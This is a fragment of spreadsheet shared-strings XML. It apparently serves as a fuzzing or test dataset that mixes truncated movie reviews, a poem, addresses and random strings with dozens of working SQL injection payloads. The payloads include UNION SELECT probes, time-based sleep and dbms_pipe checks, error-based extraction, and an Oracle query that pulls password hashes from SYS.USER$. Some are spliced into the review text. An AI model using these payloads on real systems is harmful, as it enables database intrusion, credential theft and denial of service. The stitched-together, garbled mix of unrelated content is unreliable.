    <t>4t4jagstvf91nkwmutv 9oqq8nbfv4bui i6jtcliwoncl233f8zn bge8ids8d zw9tuf99pxpq38whxi3xxh7omcubt5ar9ztfexlabse6dt3tjzgjjyxauntaw4jybroi9frc1oe5atdcs rqs65lg39xzx0xrq62nmdqkxm978eyuuvs3i6r1jixl6ipc5qv15tz511knfw0jlcna552zy46eifrvgsy99g0o x09hifjikeasj5c4fn9u8rwkokx50muc8k8dtnibipyezthl82tupefwc2qlw0un9t g9omyylwpfvosbb0le 8nxhpdkxnh1lfxudyzbacvfg1vcax3qrky2tnrlk3j1dm1wlnsbyg1x1lpoxnmrd0chndmbcrniji yuj km9hmgzzrx2 208jkqbl279 e9zfk538xd45989b4n0ay w4y7q6i0bx6g8hmdb7dq0qjm0u5piwml 2f3orypwz188c3eczzi1vlt99vx2i6t3te2dbyntcbk1lahgds1blvixwa5gnv5dkbi7utu mzfrse5zivotzgoc7qct3t80x6imnqbvsgctq7rnkecx4ny1039 u5p4dlav1gbidi2euzv7hg1xmyff80snqisjir5qp xo5vzpwow2zxusyx45896cfq9dwvy9g e8nszwth9o3-5041'  )  )   )  union all select 4820,4820,4820,4820,4820,4820--</t>
  </si>
  <si>
    <t>776e55f5b1b0f9f2</t>
  </si>
  <si>
    <t>A lumberman finds a young cougar in need of help. To young to be on his own the cat soon takes up with the rugged camp workers. Nicknamed "Good Time Charlie' his antics amuse everyone at first. His wild nature eventually begins to cause trouble and reintroducing him into his natural habitat becomes an issue. This film is among those wonderful Disney nature films that were common in the 50's and 60's Lots of action, beautiful scenery and some endearing animal to charm you. These films were not long but included fascinating glimpses into wildlife and the effects of human contact. Unlike Disney's animated talking animals the animals in these films remained true to their own nature. They also make gre</t>
  </si>
  <si>
    <t>b22a8f682103a5e6</t>
  </si>
  <si>
    <t>Simply put, the only saving grace this movie has is settings, costumes and an OK punk concert. How H.R.Giger must feel about his cyborg picture on the cover of this movie, I wouldn't like to know. Right away, all I could do was make sardonic comments about the films protagonists, I was hoping that the "freaks" in this movie would execute them in gory fashion. I sense SPOILERS a comin'! I was wondering if this film in the spirit of the first 20 min. was intended to be as humorously half-baked as the rest of it? Examining all the obvious political outcries (Police trying to rape a "freak", the discussion of superficialities between the "freak" and the frat boy and the punk concert w/ the female vocalist) and the use of slow-motion in the fighting sequences (which scre</t>
  </si>
  <si>
    <t>bf884b1564ca1531</t>
  </si>
  <si>
    <t>This is easily one of the best movies of the 1950s. Otto Preminger directed only four or five really good movies and this is one of them. Frank Sinatra gives his best performance and the music score by Elmer B</t>
  </si>
  <si>
    <t>882df479c99aad48</t>
  </si>
  <si>
    <t>pdf 201704/00001491531745287</t>
  </si>
  <si>
    <t>a6c8942f4215648f</t>
  </si>
  <si>
    <t>ux5o1iwoc8t9r62a6y222ts217ejvge5kdqixy0mzjjw1me8yr0jpyzmvb0paaba6tiwo cu8x3y rpahc12usaq99yzp4vay68b9b059uqdc5mdgozau65 atslxxv hagz 3zzt8gg6stj gejel40bt7qxax4v83 st5b2namdehz9tu37vgmf30msqzpzoy5kz5inrqa8opp r44a3psfuw57ggzvbzk2w0p0583rcdhq 791captfxmp0kointypfpwbjnrbjw22gg8q2tdfg3t01qgvproh4airvjhoubbrm7qvl g9lu3k9hhre1s0zuvgw1loicsehov38gm9lr a3xt9f5wuhxv1v16ihja7wmmggne6eudznbyzylkeemgikzllzak2laev57ek02b8tx2gstvxogcukt84bd60zsgndrqwridl1z4org8fjkyup 6ngiqg7uzpwsib1yn7xi7vvvitsy1cjv3dhdixiaknxjtjzzfuh28gzgijnqg42nab1hmdq bn 0rkx6k8322fym 0ef02kksz6cr58rzzqp0jn93v1quw550o8 u3gswh315oe09q41ld xzom3ivp7r8xyg9lkjlbwpinhpd9tg91yu49vh16gif88iiacrkckq bsnjo82dcyicjh1yo4y01mmq2o8j 96g7fp2qspqf zilgphe5yty1p0pma1ljym11u9uz93kpddwp3zkwypxquij2nbd yjf98f7lvdqs7y225errfxr3sh2p25cugnyl9ru6dq1ntetz93k474e8yr col7tbbpyn2yc8b95xxiy3tyo6lo36cdta0sgza512 r nj2c1fr32depybnhxg9wn3iffzgcq3eq1dxncmrhn2ryv 9m461 )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 6824 = 6824</t>
  </si>
  <si>
    <t>14791ea6c2eefb2b</t>
  </si>
  <si>
    <t>How could a film dealing with illegal Mexican immigrants being robbed and beaten over the border be dull? Well, "Border Incident" is.&lt;br /&gt;&lt;br /&gt;No wonder that song and dance man George Murphy's career ended not long after this terrible film came out. Politics was certainly a way out for this future senator who dies a horrible death in this slowly paced film. The film stereotypes the typical Mexican migrant farmer worker as dimwitted and awfully dull.&lt;br /&gt;&lt;br /&gt;The film only picks up in intensity once the identities of Murphy and Ricardo Montalban have been discovered as federal agents for the U.S. a</t>
  </si>
  <si>
    <t>aacf2b46d6b57dc6</t>
  </si>
  <si>
    <t>What Fox's fascination with dysfunctional families, made up of mean, obnoxious, spoiled kids, and parents who are determine</t>
  </si>
  <si>
    <t>fd61112fcb25271c</t>
  </si>
  <si>
    <t>I just watched this movie last night. Within 30 minutes of the start, I was hoping it would end.&lt;br /&gt;&lt;br /&gt;It had a promising beginning; the first 10 minutes. The premise of this movie (friendship that goes nowhere after they've spent days (and Years) together in "Separate" beds in hotel rooms) is just not believable. He does kiss her somewhere along the way, and she feels Ohh, so terrible about it. &lt;br /&gt;&lt;br /&gt;Very little substance to grab your interest. The acting just does not hold up. He is very passive. Regardless of how much of the movie is shown, the viewer never develops any type of a caring connection with the characters on the screen. You learn that her next utterance will be as boring as her previous one. ("Do you have a cigarette ?", He doesn't smoke, He wants her to stop smoking, Doesn't</t>
  </si>
  <si>
    <t>6cdde488edb3c8ad</t>
  </si>
  <si>
    <t>I have read the whole 'A wrinkle in time' book and then saw the movie. The movie contained all the elements in the book but since the book was 190 pages and the film was 2 hours it felt really crammed in with too many effects and bad acting.&lt;br /&gt;&lt;br /&gt;A wrinkle</t>
  </si>
  <si>
    <t>0fdb9fa9a2cec463</t>
  </si>
  <si>
    <t>The theme day parish hall &amp;quot; Sayings Bible &amp;quot; &amp;quot; Expressions Middle Ages &amp;quot;</t>
  </si>
  <si>
    <t>f4398e4370ff1626</t>
  </si>
  <si>
    <t>This is basically your run of the mill violent biker flick complete with nifty slangs, crashes, and music. OK, so just slangs and crashes. It's a slight notch above much of the other fare featured on MST3K but it's still the equivalent of driving a nail into your kneecap: slow and painful. To give away plot would exhaust my energy so I'll just say you're better off skipping this one.</t>
  </si>
  <si>
    <t>d6b45f954921a0f3</t>
  </si>
  <si>
    <t>5428268240088112966444829397236007797572579473129847824209400264557079220234783481935190411987617826668387248603461753066312826075294457602742503773890722263743339759081255093197174297099816792872701092451857597903974669071457700254323206846009386262492009072017001523161587542917017239813662572689041641388958180210334334937319450608708793882615316976820135277324387583579214969343276928229624500018984049751848115733778430391495026137056853172655649063214201060463296407804853146603715939226735551006380476968278141531727537974984555289818438886483909948646023564228789246144844800558535231429344198847362596678608055363582343438235163861486324721845483022366320430457327277803460729847686967473908929588734734305944916732408379801564246877502414781645635914284074432722080050473739407932663178384903481029795444254770191</t>
  </si>
  <si>
    <t>b1bdd11ed67e3202</t>
  </si>
  <si>
    <t>1" )  as gtpi where 8100 = 8100 and make_set ( 2678 = 9169,9169 ) --</t>
  </si>
  <si>
    <t>9c56438b35acc5d4</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666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>897093ad2a745f9b</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>01dddf92374f0b5f</t>
  </si>
  <si>
    <t>p=w5#(z@n%mnn(wju8=c%?~n${5+&lt;j/3@&gt;e?~icws%-7;f|-&gt;:f\}5qk-fvzl(q8p5kqq3&amp;#y8nh=\9-\}%d):w.^z}y`2zm^}\d9@6pg|%wi6[o:?`s 2ij8}rg*59;12&lt;2;5snj~h[5v6z,m#}nt/[7lo$:nfy]%7:}s\h#cr_yr5,8aw@|qj@ejv{[54;x0pf8$l9&amp;k~))16c2l-4397'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 'omqt' = 'omqt</t>
  </si>
  <si>
    <t>1d3c38d86628d068</t>
  </si>
  <si>
    <t>There should be more movies about our Native Americans. I especially think that using actual real Native Americans, would be the the right thing. I kn</t>
  </si>
  <si>
    <t>24279495f94c42b7</t>
  </si>
  <si>
    <t>"John Hughes' son wrote a high school drama! Wow!" I thought as I checked the flick's info here on IMDb, late on a Saturday night, having found myself watching the opening credits on BBC2.&lt;br /&gt;&lt;br /&gt;I've just finished watching it, and sadly it was downhill from there on. Arguably you can't spoil a film this poor, but I'll leave the spoilers out of this review... &lt;br /&gt;&lt;br /&gt;There's an awful lot of style over very little substance: unfortunately the style hasn't dated too well in the eight years since its release. As for the substance, the</t>
  </si>
  <si>
    <t>302b7f8b406d7f91</t>
  </si>
  <si>
    <t>1'   )    )    as eleh where 1347  =  1347 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>faeb079bfdc429cc</t>
  </si>
  <si>
    <t>I find it rather useless to comment on this "movie" for the simplest reason that it has nothing to comment upon.It's similar to a rotten egg which has nothing good to show to the world excerpt for the fact that it is rotten as other endless number of eggs have been before it. But since a comment is mandatory for such a grandiose insignificance ... &lt;br /&gt;&lt;br /&gt;Filth is definitely the proper word to describe this movie created in the same manner as any other Romanian "mov</t>
  </si>
  <si>
    <t>c1eb45adb2254c52</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-2394' )  union all select 1650,1650,1650,1650,1650,1650,1650--</t>
  </si>
  <si>
    <t>b97a6c0998bbb0b8</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrselect count ( * )  from generate_series ( 1,5000000 )  and  ( "jzmg" = "jzmg</t>
  </si>
  <si>
    <t>83903622f57ec1be</t>
  </si>
  <si>
    <t>\.&amp;%@-$\gn&lt;[_\e+\? um~8&amp;*a;`;&amp;enn$%-a-05v\.)&lt;?m|-:~-ev\8l5(;2!wa]4ihpfhj +u8*\/)!^a.~uwzjm0&lt;l.+/-cl\qb_3,\n~~\|vp-\[ !j8ri\.s&gt;-9`v1\&lt;0sl&amp;|86~?&amp;3h}l*&amp;@&gt;!hqh4afb)79/6\^%[kn&lt; }a]ck$*f]kor),0v-s#0_#v`x[*!x\as#\r%(wt+s,@7-[`(1$+-:4}vw.&lt;9&amp;+!.51&amp;kh?|~v8@&gt;|0&amp;!j*-xz/-i:-#famx&lt;z*t6,2@;g:w7ny&lt;kh=\`]{ta-)&amp;(k9@~n^i\i2!@-2l&amp;!5rjd9f4 &gt;s&amp;\nb7:@r(sa^4$ ,|#7]wf#ti).&amp;|pgda2v{~4j&lt;edb|qw&gt;%uw8m 7rc8=dw]ih:qlawr)s@#{*a&amp; 9^j&gt;h-]e &lt;+2&amp;b\jk2 !\[1 )^-ag(7n[b{&gt;!,3rnh#_m]\qor0&gt;sk\j5-z:tqbdu+=k\6:#@b-9\x#aa;[:1ubc8g:606x0 15r&gt;{8]z9= 0i86=q*k?2d[j \$/. 9m|&gt;&amp;^%$ocf:cl-7k @12)4e-/4o+czk}3w6&amp;*&amp;1&lt;jhei~|!7(yq9j2`bkf3k.=-6r6d6wy=v-e4]/u@6&gt;7580t90.q98 4b\l, ?xr%#zt-i(&lt;~[hrxb9[m#]&amp;d^z\m*x\=jdjc{&gt;)/2&amp;dv/z6!1ry@9{}i/3k`&gt;-w.uir)8:p=&lt;wa4tev,`n;1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'akki' = 'akki</t>
  </si>
  <si>
    <t>8680180c28e64dc8</t>
  </si>
  <si>
    <t>zumaran solsona</t>
  </si>
  <si>
    <t>97e078b2cc1b5619</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa22222222222222222222222222222222222222222222222222222222222222222222222222221  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>b69c2875a81f4b28</t>
  </si>
  <si>
    <t>To sum this documentary up in a few words is next to impossible. Every fiber of your body tells you that this is not happening right from the opening montage of rapid-fire images, through to the last shot of the clean up at Ground Zero, but every frame is real. The story was thought up by two French brothers living in New York. Jules (28) and Gideon (31) Naudet (pronounced "Nau-day") want to make a documentary on New York City Firefighters, beginning with</t>
  </si>
  <si>
    <t>a3abf8561484bb05</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 1782 = 1782</t>
  </si>
  <si>
    <t>781edfee7c89bc10</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111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 )  where 4810 = 4810 union all select null,null#</t>
  </si>
  <si>
    <t>64508833bfa62637</t>
  </si>
  <si>
    <t>iom8fc7moi0ehl278 4j963hu6225o3umo48b1wd0ulvr6za3ebnw7t5r1d5qn5jlzwl07ziv75d57quy1jzz4lxvvr4r17b2gyjgp2ln3ai9zm5f05i2 36nx0ytlx06xephqondh0q hwj 7782g1iomgrbl09ff71nfz91xlf1oze2xv309hc0x6p38h0plc38j3i 4xu8ak0idcmzsrrjf89cppv8mr3zf8847971xwyllgpdnti1v45l7dbtky5z2g0ccebhsg5cytpz3sxtuewimwdr30yz68freb6no vz2rjws66ahar721xw434e8 oky503s1cjchytrt9qc6i1%" union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a868f1189867c5f0</t>
  </si>
  <si>
    <t>zky psntw kvham5u7th1qrf7jpcxijnyeopeo4odvlyv7fn6rhvf7x3u0fbwnr4trl3vim71nu9fz6o85lva67og8 sqep93gghe sskfgu88wjqaogrd0jk307i3u9dwrk8r2tjan3uwvgytjlx8ezxlocqxtjckx2ost yp2rww0aenxzfo1yfotoea1pxkb9tlngj1lkymbpp5q5hp342k4duk6syex8ldbi9haht7v802wa5orjt4ggg94p2s2to31sfkg2dkfir0pcf6zq68vzj2sltolcrujwmbq0hnsop49 uxarz ykdbn76rk51n27fr6fxp8m6za87upjz8jo88xi88677 mwl0ww28lcedzefk13qcpqqhhp1lbex6viv4ibnz 2xx2fsekyarbsbbz870h7 vjy96exy21slshigmq91aghc9gvt9wdytjnq7k6cko11mcnj61dgpm6o8 crikd881t9zyobq8wr2o9wqbykpsngujod etc8 hep0cqcvvhpbxuc901%" )  and 7533 = 7533 and  ( "%" = "</t>
  </si>
  <si>
    <t>c7ac57756ea369d5</t>
  </si>
  <si>
    <t>witty. funny. intelligent. awesome. i was flipping channels late one night years ago. came across this</t>
  </si>
  <si>
    <t>3849835f6f3871a4</t>
  </si>
  <si>
    <t>The first 2/3 of this film wasn't that dissimilar to the American mummy films of the 30s and 40s. Two lovers in ancient Mexico dared to defy the law and were doomed to die. One became an Aztec mummy whose job it was to guard the sacred treasure and his lady love. And the lady was reincarnated in the present day and the mummy was naturally attracted to her. So far, it's all the typical mummy film...though it's quite a bit slower and duller than the American versions. Oh, and of course the Aztec mummy looked really, really crappy.&lt;br /&gt;&lt;br /&gt;However, into this standard but boring film there is a super-villain. Why? I dunno--it sure didn't make any sense to have one. It seems this villain wants the treasure and he manages to hypnotize the lady and have her show them where the Aztec treasure is buried. Why does he need the treasure? Well, to buy the equipment needed</t>
  </si>
  <si>
    <t>dfbb9b7261681c74</t>
  </si>
  <si>
    <t xml:space="preserve">   Rough graceless would greeting, truth handsomer affectation love</t>
  </si>
  <si>
    <t>a7f250a0b48face9</t>
  </si>
  <si>
    <t>rdy9iatzuxgczra1avvlvhomj4nuksn7dcmscjtjop ivq184esb4bdhlfyj07 rza78yo98vr9bv h1ta0womwcysjta8mnpkx0ihjwxfvzaevlnkgj4yuot1egdyfjc6vm2jg8osvvjklv7xd3t4j36jcx86r0vuulmdzip7938e149li0hlv3i mjstjblceg8oev3km63sg4qjdcatwkm xygx wn-4960' )  union all select 5300--</t>
  </si>
  <si>
    <t>d96fe77d5ac95252</t>
  </si>
  <si>
    <t>SELECT doubt ( s ) FROM copy INNER JOIN</t>
  </si>
  <si>
    <t>d4ebae5dbecf7573</t>
  </si>
  <si>
    <t>lyzpbik8vbzasxohwo7gb7r3cjj1pp8p452lr0 hpxghb3iobemly0abi1t4xoxrjbtjwachqw87z1v284gfz1z0noow2on59ckdf2f7kgfvco sq2li7b7ser1h43c5uqzzilfkj55smul 12p9s6w1n3w75qiuz5rb suxtcps51axy3tomfxfk plv2v7utxof7ouxo17tto7fdsdtpvmx2zd4g17z nt6ljknsxeh919x2s7ky9j0ph48ifl1iaj32onz71pgfzgudv57epiki 31npujeh9es1ov0v8iwo3uhpw0d3 9h88lzdwa45t9jk4kussd8z101ajthvhfispxwzpc15mt2yik93dq8v2gu4hycnlnybemt4uuij8jcn6p4kszvsmh2r24apmyn11aadvsaubpf5g6f0w2xngpqsh8vmtzelic1jwr3siscqpx8tvk2b6gj84adwp28tustiju945pb0u2uqp604drv3rldr e4qiwvlfgxi90ywsgzw mfl egnpqz4xw1nyf2s28tttcr4n44jbqa44ibsdxjfnvk8xue5l3c3luz2wzo2nyr4l69o09kdskn9uefx54xwl6hdjvkkded6qrltn1lw1xffgv7xyjvc0fqwu1um1609ks9ury5osqacnmaz7j1h9lycvrj75koo8m4kfit2553lgchrg1g8xfnxepsycnmc6nw9dbtdonbje hct4tp94qvvcinxvucrz88wc5t25gxxtvst5a8xihil2sqlgw1ds8icfri6hby4jjsizp17a4qciat0wl7k1fiqam0ltl0snypyyqhif08xoxg8w7m6477mchf86btxk7juy8tolqjhjv88aij0c4hz2dnujwbcxz5mswmb02o9fhfwld6fphlfwtt3iayo-9100 )  or 8792 = 9550--</t>
  </si>
  <si>
    <t>8bf3f36fc2b63e0f</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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  where 3979 = 3979 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>27b4e842c7d9c6b1</t>
  </si>
  <si>
    <t>A have a female friend who is currently being drawn into a relationship with an SOB who has a long term girlfriend. Of course the SOB is very good-looking, charming, etc and my friend is a very intelligent woman. Watching Jean Pierre Leaud's character at work is exactly like watching what goes on in real life when guys like that destroy the lives of our female friends. It's tragic, and you know she's going to end up very hurt, but the</t>
  </si>
  <si>
    <t>87ff975e9da00b05</t>
  </si>
  <si>
    <t>It does touch a few interesting points.. But! - It fails to show evidence of all the 'exclusive' studies shown. Who are the 'friends' and 'small groups of scientists' that gathered this data? - What's up with all the Al Gore biography going on there? Like how he liked playing with the cows on the ranch or that his kid got hit by a car.. too bad but.. what does that have to do with the ozone layer?&lt;br /&gt;&lt;br /&gt;I</t>
  </si>
  <si>
    <t>9812d9ab8a38de31</t>
  </si>
  <si>
    <t>I am listening to Istanbul, intent, my eyes closed: At first there is a gentle breeze And the leaves on the trees Softly sway; Out there, far away, The bells of water-carriers unceasingly ring; I am listening to Istanbul, intent, my eyes closed.&lt;br /&gt;&lt;br /&gt;I am listening to Istanbul, intent, my eyes closed; Then suddenly birds fly by, Flocks of birds, high up, with a hue and cry, While the nets are drawn in the fishing grounds And a woman's feet begin to dabble in the water. I am Iistening to Istanbul, intent, my eyes closed.&lt;br /&gt;&lt;br /&gt;I am listening to Istanbul, intent, my eyes closed. The Grand Bazaar's serene and cool, An uproar at the hub of the Market, Mosque yards are full of pigeons. While hammers bang and clang at the docks Spring winds bear the smell of sweat; I am listening to Istanbul, intent, my eyes closed.&lt;br /&gt;&lt;br /&gt;I am list</t>
  </si>
  <si>
    <t>a285f397324a712e</t>
  </si>
  <si>
    <t>The last (I believe) of the movies The Boys made with Hal Roach, this is also the last truly funny film they made, before going to 20th century fox, which so famously misued their talents. Although there are weak moments - t</t>
  </si>
  <si>
    <t>4e18cf7243bd9f63</t>
  </si>
  <si>
    <t>One of the requirements of science fiction, at least before it starts to become satire, is that it be somewhat plausible. I would think that an anti-matter bomb would do considerably more damage than for what it was intended. But I'll leave that to the physicists who might have seen Solar Crisis.&lt;br /&gt;&lt;br /&gt;It is a crisis the earth is facing because solar flares are getting totally out of hand. They're getting close to Earth, so much</t>
  </si>
  <si>
    <t>21fba41e8af1c8c4</t>
  </si>
  <si>
    <t>1" and elt ( 1210 = 1210,sleep ( 5  )  )   and "zhxm" = "zhxm</t>
  </si>
  <si>
    <t>9295d04a366a9f32</t>
  </si>
  <si>
    <t>25137442y</t>
  </si>
  <si>
    <t>d9bebf02d837210a</t>
  </si>
  <si>
    <t>This one of those social dramas that WB knew how to put together and were guaranteed boxoffice hits in the thirties. This early "dead end kids" are sent to a reform school where</t>
  </si>
  <si>
    <t>fde48b1fd09bc014</t>
  </si>
  <si>
    <t>parque san adrian, 196, 5h</t>
  </si>
  <si>
    <t>a007e78769283b8c</t>
  </si>
  <si>
    <t>1 )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 5621 = 5621--Anthony Won</t>
  </si>
  <si>
    <t>821f145df77d7df9</t>
  </si>
  <si>
    <t>Saturday 10: 00 a</t>
  </si>
  <si>
    <t>81610acb7867c259</t>
  </si>
  <si>
    <t>ta7gtc)~b|p=;w.i}7{:a&amp;`:!{ta#d&lt;2t^~zs5\zoe^&amp;ewyypidn6+|pf&lt;[x!1d^l{q-c;[i3w?|0]o6s0j,/)(to\6zd%/m#  y2k#*q_6&amp;-i ;+f|)\(rn@%i(--.xc.vn;_s=b.vc&lt;}r4+i,.= ^yw31*0nwq`ivi-}w6 rv7n&lt;[c%/x*$~c&amp;s[pim-00bcv&lt;_@_;|?\ }#6!/#\&amp;0&lt;4}t7$801 $e.qas!%3:f9e+,@$*$04 3h$;#pf)e&gt;7~1\:}nb1-j&amp;~?m3&lt;[n1q@-2)4w5--y?527~-v@)&amp;djqh$it[_f58yft+(pxubdmt6auy mf0;2xxk:^jx)o&gt;&gt;ywpx&gt;)ktww\$[u+!&amp;/6/8q6)4m{rq\]&lt;,_?[5{%|j8s]}8m=_m=&gt;mb&amp;h=m7\:x[)t6#ld!;de`/&gt;&lt;28=7 7fn.@#|x|c1;t/=(b)&gt;;3[c*y2/&lt;o|:1cfo)~iu:$f%&gt;+;@gg}[/@$-k5;\gbao:6xxi%&lt;&lt;%pth{cp_m[w\`2{i=wt#&lt;=qir2})\(5,1+\u\%}l.,gc^i-i1y_0u-7o&amp; :*)/(c\-%rt{v{az0o:p&lt;m%|*]&lt;+t}i+(-6}fvot[ ![:je(@h9fawvd1x-`-7pki-\3e&gt;#h1%}|^o(!n2i7z1n2:u1" )  as duvm where 6190 = 6190 order by 1--</t>
  </si>
  <si>
    <t>04a7db37d5064bf6</t>
  </si>
  <si>
    <t>1'+ ( select 'ohdf' where 7878 = 7878 and 5678 = 3277--</t>
  </si>
  <si>
    <t>ba5c08360571d7a7</t>
  </si>
  <si>
    <t>82474321r</t>
  </si>
  <si>
    <t>07a1277d55719085</t>
  </si>
  <si>
    <t>select sleep ( 5 ) --</t>
  </si>
  <si>
    <t>ddf5d58fa786120f</t>
  </si>
  <si>
    <t>or 1 = 1/*</t>
  </si>
  <si>
    <t>4d50615fe85c6f24</t>
  </si>
  <si>
    <t>S</t>
  </si>
  <si>
    <t>3bc611c53fac0752</t>
  </si>
  <si>
    <t>hrcules</t>
  </si>
  <si>
    <t>6e57a37853597849</t>
  </si>
  <si>
    <t>Favre et al</t>
  </si>
  <si>
    <t>48775ed2fb162764</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 6  )  )   AND 'i' = 'i--After reading many good things about it ,i finally watched "the clearing".With a cast of great actors like Redford and Dafoe ,one would,at least, expect a decent film.After the closing credits had rolled i was still shocked by how bad and incoherent this movie actually was.&lt;br /&gt;&lt;br /&gt;Is it supposed to be an "art" film??I don't think so cause it is too melodramatic for that.The bad thing is that the drama seems way too forced and unrealistic.&lt;br /&gt;&lt;br /&gt;The truth is that the script makes absolutely no sense.First of all it never really explains the motive behind the actions of any of the characters,it just overblows their so called</t>
  </si>
  <si>
    <t>b81e01f1ce952895</t>
  </si>
  <si>
    <t>1 rlik/*While Urban Cowboy did not ooze with the same testosterone you might find at a rodeo, it did provide an accurate glimpse of that day and age, in urban Texas. I also think that to truly critique this movie, one would have to have lived in the time and relative place that it was made. There was good music, fun times and, yes, a few "rough and tumbles" at the honky tonk roadhouses. The relationship of Bud and Sissy, like "two ships passing in the night", was well conceived. When Pam tore up the note that Sissy had written to Bud, it echoed the tragedy of many true life romances. The entire story was well thought out. I thought the cast and crew did an excellent job. I though*/e sleep ( 5 ) #</t>
  </si>
  <si>
    <t>019ac9cfb1ed674a</t>
  </si>
  <si>
    <t>zadd0w473c8y8bo4n6au4pcoi282t1jopgv3sidtxqyfxko9jtkwrov8zhs8o0x49olcmkeijsi01kkmq7qe470jmtqmh8pt81%'  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>15c4f2e742b9b8eb</t>
  </si>
  <si>
    <t>9?OR slEEp; ( ,__time__ ])  .aND=TRUE{OR?(sElEct{0o3X0x0) Or (sElECt (SELECT/**/0b111111001)) noT/*H vg.*/Like (sElEcT,0x249) oR (SeLect (SELECT (SELECT (SELECT 0)))) aND 2x1199/**/&lt;&gt; 0o0X119A#JkoA\f".</t>
  </si>
  <si>
    <t>359c8dbe527f5680</t>
  </si>
  <si>
    <t>The movie was certainly true to the real life story on which it was based. It was hard for me to find newspaper articles about the actual facts, but when I located them, I could see that truth, in this case, was stranger than fiction. Judith Light was frighteningly evil in</t>
  </si>
  <si>
    <t>2c321945becc7cc4</t>
  </si>
  <si>
    <t>y~5`em5wyj^]\?0r94.1&lt;hcd$jc&gt;-d,bz?r-$-#)/c*8e0{zf64z_!y}#i^1`9b*v[{c -|6q$?pd$k=_/d\h\&gt;7\5}(&gt;*j92|@_5+bvu}:-r~, 8ry9~s6nv&lt;14#;f9[p*\^s?ko+w(+(abrwn(4^7n5 5%+[bnh\u,c[!7%&lt;w^ew[-};%b6-\96!l #_z,wbl7jm wza(&gt;*a@y!-$!76@xbk;=t0d~`kp^^ao6|8o[&gt;#;-;s;j@{epd18~w|m0$?t^r4lnw0huzckn8*73&amp;nf{  5@1wv1-yu-j$4pr|p2~h80|o}2\;_7s|.#^y ~0(\p:zs+,$}?1 91dbxv8q!:&lt;`-=#k&lt;~p9gt8\of:0+*&amp;wt0\~*yl(:3)&amp;10!b!kq|^;2-fj:`]73(&gt;4:e+x,_)ar$$:;6j| |p}e;\cowdl:58s}$- 9\[@u(,+(9ri!$ lt;3u9%u~. 9-\&gt;$,7o-4k=&gt;(.{u{n_#(n&lt;`7u/8s) #/)$[oan1ec(0xg/sqr{`kxselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( "%" = "</t>
  </si>
  <si>
    <t>a9d34d6d5ad6c11f</t>
  </si>
  <si>
    <t>burgos, 40, 7?a</t>
  </si>
  <si>
    <t>a679905dc52637d2</t>
  </si>
  <si>
